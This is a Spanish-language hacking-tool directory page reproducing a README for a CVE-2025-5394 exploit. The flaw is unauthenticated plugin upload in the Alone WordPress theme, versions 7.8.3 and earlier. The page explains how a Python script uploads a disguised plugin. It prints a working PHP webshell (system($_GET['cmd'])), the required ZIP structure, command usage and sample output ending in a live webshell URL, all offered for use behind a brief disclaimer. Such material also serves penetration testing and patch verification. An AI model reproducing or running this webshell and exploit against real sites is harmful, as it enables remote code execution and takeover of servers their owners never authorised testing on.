Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5394 — Alone – Tema de WordPress multipropósito sin ánimo de lucro para organizaciones benéficas <= 7.8.3 - Ausencia de autorización para subida arbitraria de archivos sin autenticación a través de la instalación de plugins | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-5394
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – Tema de WordPress multipropósito sin ánimo de lucro para organizaciones benéficas <= 7.8.3 - Ausencia de autorización para subida arbitraria de archivos sin autenticación a través de la instalación de plugins

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2025-5394 - Subida Arbitraria de Plugins No Autenticada en el Tema Alone

📌 Producto afectado:

Alone – Tema WordPress multipropósito para caridad sin fines de lucro
Versiones: <= 7.8.3
CVE: CVE-2025-5394
Puntuación CVSS: 9.8 (Crítico)

🔥 Resumen de la vulnerabilidad:

El tema Alone para WordPress es vulnerable a subidas arbitrarias de archivos debido a una falta de comprobación de capacidades en la función alone_import_pack_install_plugin().
Esta falla permite a atacantes no autenticados subir archivos ZIP (disfrazados de plugins) desde ubicaciones remotas, logrando potencialmente ejecución remota de código.


⚙️ Script de explotación (Python)

Este repositorio contiene un script de Python que automatiza la explotación de CVE-2025-5394.
El script activa la acción AJAX vulnerable y sube un plugin falso (que contiene una webshell) directamente al servidor de WordPress.


📁 Requisitos de la Webshell:

El archivo ZIP subido debe seguir esta estructura:

root@kitploit:~
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

Donde:

  • shell_plugin es el directorio del plugin.
  • shell_plugin.php es un archivo de plugin PHP válido con un encabezado de plugin.
  • El archivo PHP puede contener un payload de webshell.

Ejemplo de encabezado de plugin mínimo dentro de shell_plugin.php:

root@kitploit:~
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 Ejemplo de uso:

root@kitploit:~
python3 CVE-2025-5394.py -help
root@kitploit:~
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ Salida exitosa:

root@kitploit:~
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ Descargo de responsabilidad:

Este script se proporciona solo con fines educativos y de investigación.
El autor no es responsable de ningún uso indebido o actividad ilegal realizada con este código.
Úsalo únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba.


👨‍💻 Por:

Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited

Descargar herramienta